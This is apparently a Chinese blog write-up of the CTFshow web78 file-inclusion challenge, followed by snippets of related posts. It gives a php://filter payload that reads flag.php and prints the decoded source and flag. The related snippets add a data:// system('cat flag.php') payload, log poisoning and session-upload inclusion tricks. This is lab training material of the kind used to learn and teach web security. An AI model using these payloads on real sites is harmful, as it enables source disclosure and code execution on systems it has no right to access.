CTFshow web入门web78-文件包含1

最新推荐文章于 2024-08-05 16:45:50 发布

郭与童

最新推荐文章于 2024-08-05 16:45:50 发布

阅读量144

点赞数 1

文章标签： php

本文链接：https://blog.csdn.net/weixin_74336671/article/details/134658872

版权

初始化界面：

通过分析，此处未进行任何的过滤

这里有个include文件包含。利用Filter机制，构造

php://filter/convert.base64-encode/resource=×××

的攻击数据读取文件，拿到各种文件的源码

payload:

?file=php://filter/convert.base64-encode/resource=flag.php

将得到的base64字符串进行base64解码：

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 10:55:11
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-16 10:55:20
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

$flag="ctfshow{fa08f72a-9d42-4ec4-a383-1dd04cfebf2d}";

将flag提交结束！

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

郭与童

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

ctfshow WEB入门文件上传151-170_ctfshow web入门文件包含167(1)

2401_84297265的博客

04-28

886

只是过滤了分号，其他同上。php的最后一个分号可以省略。

ctfshow web入门文件包含82-86

xiaolong22333的博客

12-14

2457

知识点：利用session.upload_progress进行文件包含 条件竞争思路就是通过上传PHP_SESSION_UPLOAD_PROGRESS来访问/tmp/sess_xxx,从而进行文件包含 原理可以看这篇文章利用session.upload_progress进行文件包含和反序列化渗透其中主要的几点首先上传PHP_SESSION_UPLOAD_PROGRESS，代码如下 <!DOCTYPE html> <html> <body> <f

参与评论您还未登录，请先登录后发表或查看评论

CTFshow 文件包含 web78

Kradress的博客

12-07

137

目录源码思路题解总结源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 10:52:43 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 10:54:20 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['file'])){

CTFshow_web入门_文件包含_web78-

weixin_43896504的博客

07-22

438

文件包含

CTFSHOW WEB入门 文件包含 web78-

sinat_41572027的博客

07-11

846

CTFSHOW WEB入门 文件包含 web78.79.80.81.87.88.116.117

ctfshow-web78(文件包含)

m0_62094846的博客

01-11

1279

if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } ?file=php://filter/read=convert.base64-encode/resource=flag.php

CTFshow 文件包含 web78-88 116 117

最新发布

potatojiang的博客

08-05

1067

这里我们需要注意的是我们的php://fiter/write=convert.base64-encode/resource=2.php需要进行两次url编码，而对我们的<?>需要进行一次base64编码，由于base64编码范围的原因<?>会被过滤为phpdie为6个，需要加上任意2个在base64范围内的字符即可，所以。PHP_SESSION_UPLOAD_PROGRESS获取实时文件上传进度，利用这个函数将内容写在文件中去。先确认文件存在，检测有没<，在把文件包含。发现一个png文件，保存下来。

ctfshow WEB入门文件上传151-170_ctfshow web入门文件包含167(2)

2401_84297265的博客

04-28

994

这里我的后门代码给的是post一定要把请求方法改成post(URL前面的)，我以前一直没有注意这个细节，想来有很多莫名其妙的问题多半是因为这个。这里希望能得到大家的指点。我还尝试了对比上传两张图片的内容，在非修改处的地方进行插入木马，但是错了，不知道是因为我操作上有问题，还是说这样会导致图片内容不完整。说明里面的后门代码生效了，且内容在图片内容里面，抓包或者010editor等里面才看得出来，浏览器看不出来。且这道题对图片内容也有检测，也就是说不能像之前的题给它传一个图片头就完了，要有合法的图片内容。

CTFshow web入门web82-文件包含5

weixin_74336671的博客

12-06

675

因为有die(与exit意思一样)，导致即使我们成功写入一句话，也执行不了（这个过程在实战中十分常见，通常出现在缓存、配置文件等等地方，不允许用户直接访问的文件，都会被加上if(!$file是我们我们可控的协议流，我们使用base64编码，在解码时去掉退出代码中不支持的字符，变为phpdie，在后面加上aa使得能正常解码phpdieaa（base64编码解码特性，4字节一组）file_put_contents(urldecode($file), "<?php die('大佬别秀了');

ctfshow学习记录-web入门-文件包含-web78

xhxuhuan的博客

06-22

281

include包含，直接用伪协议就可以。filter:过滤convert:转变encode:编码resourece:资源。

ctfshow 文件包含Web78-79

m0_62584974的博客

04-15

1897

Ctfshow文件包含漏洞Web78 2022/4/15 漏洞简介： 文件包含函数的参数没有经过过滤或者严格的定义,并且参数可以被用户控制,这样就可能包含非预期的文件。如果文件中存在恶意代码，无论文件是什么类型,文件内的恶意代码都会被解析并执行。文件包含漏洞可能会造成服务器的网页被篡改、网站被挂马、服务器被远程控制、被安装后门等危害。 Web78 考察php伪协议 php://伪协议：php://伪协议是PHP提供的一些输人输出流访问功能，允许访问PHP的输入输出流，标准输人输出和错误描述符,.

CTFshow 文件包含Web78-Web117

dasdasdasvsdV的博客

08-04

375

注意用法，allow_url_fopen和allow_url_include都满足的时候才可以用常用场景：文件包含、文本包含。

ctfshow_web入门_文件包含_web78~web117

qq_62989306的博客

09-13

882

文件包含之php://filter伪协议、data协议、包含日志文件、session.upload_progress利用、条件竞争、死亡绕过……

【CTFshow】文件包含web78-web81

weixin_51614272的博客

02-25

4808

文件包含web78-web81web78web79php://input伪协议data协议web80php://input伪协议日志包含绕过web81web82(没完全理解) web78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 看到源码中的include函数，这个表示从外部引入php文件并执行，如果执行不成功，就返回文件的

ctfshow学习记录-web入门（文件包含78-87）

龟速更新的九某人

07-04

1911

ctfshow学习记录-web入门（文件包含web78-87）

[ctfshow]web入门文件包含78-88

L1ni01

12-04

2778

web 78 payload:?file=php://filter/read=convert.base64-encode/resource=flag.php web 79 payload: ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= web 80-81 试了试文件日志包含漏洞先抓包,发现是nginx，一般的日志路径为 /var/log/nginx/access.log 访问发现成功进行getshel

ctfshow web入门 文件包含:web78-web81 web88 web116 web117

rawrecruit的博客

04-14

7419

个人ctfshow刷题记录

ctfshow-web入门-文件包含（web78、web79、web80、web81）

Welcome To Myon'Blog !

07-04

1895

中间件的日志文件会保存网站的访问记录,比如HTTP请求行,User-Agent,Referer等客户端信息，如果在HTTP请求中插入恶意代码,那么恶意代码就会保存到日志文件中,访问日志文件的时候，日志文件中的恶意代码就会执行,从而造成任意代码执行甚至获取shell。此外我们也可以使用 data:// 协议进行代码执行，其实和 php://input 是一样的，让用户可以控制输入流，当它与文件包含函数结合时，用户输入的 data:// 流就会被当作 php 文件执行。会将我们输入的 php 替换为问号?

ctfshow web入门 78-88的文件包含

Firebasky的博客

09-18

4222

1. web78 PHP伪协议读取 ?file=php://filter/convert.base64-encode/resource=flag.php 2. web79 ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php'); 然后查看源代码 3. web80-

CTFshow web 入门 web78------web81 文件包含wp

2202_75289892的博客

08-01

749

php代码?分析代码，repalce函数将输入值中的php替换成？，可见此处php被过滤。2.得到以上文件，可知我们需要访问flag.php文件。上一题的该方法无法得到flag，会被替换成？最后右键查看源代码，得到flag。文件包含类型，并且没有任何过滤。那么考虑对php代码进行编码。system()用法如上图。查看源代码得到flag。